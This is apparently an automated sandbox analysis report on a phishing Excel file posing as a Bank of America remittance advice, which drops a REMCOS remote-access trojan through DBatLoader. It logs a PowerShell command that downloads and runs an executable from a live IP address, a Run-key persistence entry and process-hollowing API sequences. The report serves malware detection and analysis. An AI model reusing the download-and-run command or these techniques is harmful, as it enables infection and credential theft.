Source: 24.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 44.2.logagent.exe.10591a73.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 44.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 44.2.logagent.exe.250000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.logagent.exe.10591a73.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000002C.00000002.512423123.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: Process Memory Space: powershell.exe PID: 6584, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\Public\Libraries\eljkarS.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_00412BE1 ExitWindowsEx,LoadLibraryA,GetProcAddress,

24_2_00412BE1

Source: C:\Windows\SysWOW64\logagent.exe	Code function: String function: 0042F49E appears 37 times
Source: C:\Windows\SysWOW64\logagent.exe	Code function: String function: 00402084 appears 70 times
Source: C:\Windows\SysWOW64\logagent.exe	Code function: String function: 0042FB60 appears 42 times

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0041412B CreateProcessW,CloseHandle,FindCloseChangeNotification,FindCloseChangeNotification,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,

24_2_0041412B

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winXLSM@37/21@18/4

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\filesvr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

24_2_004163AD

Source: C:\Windows\SysWOW64\logagent.exe

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs'

Source: C:\Users\Public\filesvr.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\filesvr.exe
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\filesvr.exe 'C:\Users\Public\filesvr.exe'
Source: C:\Users\Public\filesvr.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\Public\filesvr.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\filesvr.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknown	Process created: C:\Users\Public\Libraries\Srakjle\Srakjle.exe 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\dwhqbdxsbnvloizrbdml'
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\nyuabviupwnyypwvkgznugfs'
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\psztcntndefdbvkhbrmoflajdfh'
Source: unknown	Process created: C:\Users\Public\Libraries\Srakjle\Srakjle.exe 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs'
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\filesvr.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\filesvr.exe 'C:\Users\Public\filesvr.exe'	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\dwhqbdxsbnvloizrbdml'	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\nyuabviupwnyypwvkgznugfs'	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\psztcntndefdbvkhbrmoflajdfh'	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_00413958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

24_2_00413958

Source: C:\Windows\SysWOW64\logagent.exe

System information queried: HandleInformation

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{BEB08567-402D-4BDE-BE2F-B98C52886DD7} - OProcSessId.dat

Jump to behavior

Source: logagent.exe, 00000024.00000002.422711072.0000000000400000.00000040.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: logagent.exe, 00000024.00000002.422711072.0000000000400000.00000040.00000001.sdmp, logagent.exe, 00000026.00000002.411330653.0000000000400000.00000040.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: logagent.exe, 00000024.00000002.422711072.0000000000400000.00000040.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: logagent.exe, 00000024.00000002.422711072.0000000000400000.00000040.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: logagent.exe, 00000024.00000002.422711072.0000000000400000.00000040.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: logagent.exe, 00000024.00000002.422711072.0000000000400000.00000040.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: logagent.exe, 00000024.00000002.422711072.0000000000400000.00000040.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0040D211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

24_2_0040D211

Source: C:\Windows\SysWOW64\logagent.exe	Mutant created: \Sessions\1\BaseNamedObjects\Sept-AITAB5
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_01

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\Public\filesvr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\filesvr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\filesvr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: BoFA_Remittance Advice_21219.xlsm

Initial sample: OLE zip file path = xl/media/image1.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Data Obfuscation:

Yara detected DBatLoader

Show sources

Source: Yara match

File source: 00000027.00000002.512103234.0000000002493000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB7FC9 pushfd ; retf	20_3_03CB7FCE
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB41EA push eax; iretd	20_3_03CB41F1
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB7BE5 pushad ; retf	20_3_03CB7BF4
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB97E4 push ecx; ret	20_3_03CB9848
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB514B push edi; retf	20_3_03CB514C
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB917B push edx; ret	20_3_03CB917C
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB909D push edx; iretd	20_3_03CB909E
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB9495 push ecx; ret	20_3_03CB9496
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB6ABE push esp; ret	20_3_03CB6AC4
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB9845 push ecx; ret	20_3_03CB9848
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB5A64 push esp; iretd	20_3_03CB5A6A
Source: C:\Users\Public\filesvr.exe	Code function: 20_3_03CB742F push ecx; retf	20_3_03CB7433
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004510A8 push eax; ret	24_2_004510C6
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00458445 push esi; ret	24_2_0045844E
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00450786 push ecx; ret	24_2_00450799
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0042FBA6 push ecx; ret	24_2_0042FBB9

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

24_2_0040CD09

Source: C:\Users\Public\filesvr.exe	File created: C:\Users\Public\Libraries\Srakjle\Srakjle.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\filesvr.exe			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\filesvr.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\filesvr.exe

Jump to dropped file

Source: C:\Users\Public\filesvr.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Srakjle			Jump to behavior
Source: C:\Users\Public\filesvr.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Srakjle			Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

24_2_004163AD

Source: C:\Windows\SysWOW64\logagent.exe

24_2_0040CD09

Source: C:\Windows\SysWOW64\logagent.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
